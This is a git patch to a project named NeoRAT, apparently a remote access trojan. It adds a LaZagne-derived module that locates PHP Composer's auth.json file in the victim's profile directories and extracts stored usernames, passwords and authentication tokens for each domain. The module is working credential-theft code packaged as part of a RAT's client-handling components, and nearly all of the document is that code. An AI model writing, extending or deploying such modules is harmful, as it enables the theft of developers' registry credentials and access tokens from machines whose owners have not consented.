From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT --- .../lazagne/softwares/php/__init__.py | 0 .../lazagne/softwares/php/composer.py | 61 ++++++++++++++++++++++ 2 files changed, 61 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/php/__init__.py create mode 100644 foreign/client_handling/lazagne/softwares/php/composer.py (limited to 'foreign/client_handling/lazagne/softwares/php') diff --git a/foreign/client_handling/lazagne/softwares/php/__init__.py b/foreign/client_handling/lazagne/softwares/php/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/foreign/client_handling/lazagne/softwares/php/composer.py b/foreign/client_handling/lazagne/softwares/php/composer.py new file mode 100644 index 0000000..a476261 --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/php/composer.py @@ -0,0 +1,61 @@ +# -*- coding: utf-8 -*- +import json + +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.constant import constant + +import os + + +class Composer(ModuleInfo): + + def __init__(self): + ModuleInfo.__init__(self, 'composer', 'php') + + def extract_credentials(self, location): + """ + Extract the credentials from the "auth.json" file. + See "https://getcomposer.org/doc/articles/http-basic-authentication.md" for file format. + :param location: Full path to the "auth.json" file + :return: List of credentials founds + """ + creds_found = [] + with open(location) as f: + creds = json.load(f) + for cred_type in creds: + for domain in creds[cred_type]: + values = { + "AuthenticationType" : cred_type, + "Domain" : domain, + } + # Extract basic authentication if we are on a "http-basic" section + # otherwise extract authentication token + if cred_type == "http-basic": + values["Login"] = creds[cred_type][domain]["username"] + values["Password"] = creds[cred_type][domain]["password"] + else: + values["Password"] = creds[cred_type][domain] + creds_found.append(values) + + return creds_found + + def run(self): + """ + Main function + """ + + # Define the possible full path of the "auth.json" file when is defined at global level + # See "https://getcomposer.org/doc/articles/http-basic-authentication.md" + # See "https://seld.be/notes/authentication-management-in-composer" + location = '' + tmp_location = [ + os.path.join(constant.profile["COMPOSER_HOME"], u'auth.json'), + os.path.join(constant.profile["APPDATA"], u'Composer\\auth.json') + ] + for tmp in tmp_location: + if os.path.isfile(tmp): + location = tmp + break + + if location: + return self.extract_credentials(location) -- cgit v1.2.3